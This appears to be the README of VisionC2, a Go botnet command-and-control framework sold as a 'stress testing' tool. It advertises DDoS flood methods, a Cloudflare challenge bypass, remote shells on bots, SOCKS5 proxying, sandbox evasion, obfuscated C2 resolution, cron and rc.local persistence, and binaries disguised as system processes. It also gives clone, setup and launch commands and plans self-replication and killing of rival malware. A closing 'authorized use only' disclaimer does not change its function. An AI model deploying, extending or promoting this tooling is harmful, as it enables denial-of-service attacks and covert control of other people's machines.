VisionC2 is a Go-based C2 framework for network stress testing. Features a full-screen TUI, TLS 1.3 + HMAC auth + sandbox evasion, remote shell, SOCKS5 proxy, and advanced Layer 4/7 attack methods.
- Layer 4 Attacks – UDP, TCP, SYN, ACK, GRE, DNS flood methods
- Layer 7 Attacks – HTTP/HTTPS/TLS with HTTP/2 fingerprinting and Cloudflare UAM bypass (including CAPTCHA solving)
- Remote Execution – Interactive and fire-and-forget shell commands
- SOCKS5 Proxy – Convert any agent into a SOCKS5 proxy server
- Full-screen TUI Command & Control
- Real-time bot management & attack builder
- Single-Agent Control – Interactive per-bot shell
- Broadcast Shell Execution – Filter by architecture, RAM, and bot count
- Built-in SOCKS5 Proxy Manager – One-click setup per bot
- TLS 1.3 with Perfect Forward Secrecy
- HMAC challenge-response authentication
- Multi-layer obfuscation (RC4, XOR, byte substitution, MD5)
- Anti-analysis & sandbox detection
- 2 Servers → 30k–40k RPS
- Layer 4 Throughput (2 servers) → 2–6 Gbps
- 14+ architectures with automated cross-compilation
- Fully automated ~5-minute setup
Performance depends on agent hardware and network conditions.
[ Admin ] → [ C2 Server/TUI ] ↔ [ Bot Agents ]
│ │
TLS 1.3 │ ├─ Persistence (cron/rc.local)
HMAC Auth │ ├─ Multi-layer C2 Resolution
│ ├─ Sandbox Detection
│ └─ Encrypted Command Loop
│
└─ Issues HMAC challenge
Verifies response
Queues commands
Bot Authentication Flow:
- C2 Decryption + C2 Resolution – Base64 → XOR → RC4 → Byte Sub → MD5 → DoH TXT/DNS A
- HMAC Auth – TLS handshake → Challenge → Response (MD5(ch+MAGIC+ch)) → AUTH_SUCCESS
- Runtime – Encrypted command loop, attacks, shell, SOCKS5, reconnect on drop
sudo apt update && sudo apt install -y upx-ucl openssl git wget gcc python3 screen
# Install Go 1.23+ from https://go.dev/dl/git clone https://github.com/Syn2Much/VisionC2.git
cd VisionC2
python3 setup.pyAfter setup, review setup_config.txt:
- C2 address & ports
- Magic code & encryption keys
- Generated 4096-bit TLS certificates
TUI Mode (recommended)
cd cnc
./cncSplit / Multi-User Mode
./cnc --split
# nc <server-ip> <admin-port>Bot binaries are automatically built into bot/bins/.
Binaries are named to resemble system processes for operational blending:
| Binary | Architecture | Description |
|---|---|---|
| kworkerd0 | x86 (386) | 32-bit Intel/AMD |
| ethd0 | x86_64 | 64-bit Intel/AMD |
| mdsync1 | ARMv7 | Raspberry Pi 2/3 |
| ip6addrd | ARM64 | Raspberry Pi 4 / Android |
| … | +10 more | MIPS, PPC64, RISC-V, s390x |
See bot/build.sh or USAGE.md for full mapping.
- Improved daemonization & persistence
- Locker/killer (removal of competing agents)
- Auto-generated DGA fallback domains
- Self-replication & spreading
- Single-instance port takeover
| File | Description |
|---|---|
| USAGE.md | Setup, deployment, and TUI usage |
| COMMANDS.md | Full CNC command reference |
| CHANGELOG.md | Version history |
FOR AUTHORIZED SECURITY RESEARCH AND STRESS TESTING ONLY
The authors assume no responsibility for misuse or legal consequences.
GNU License – see LICENSE
- GitHub Issues for bugs & feature requests
- Documentation in
USAGE.md - Contact:
dev@sinners.city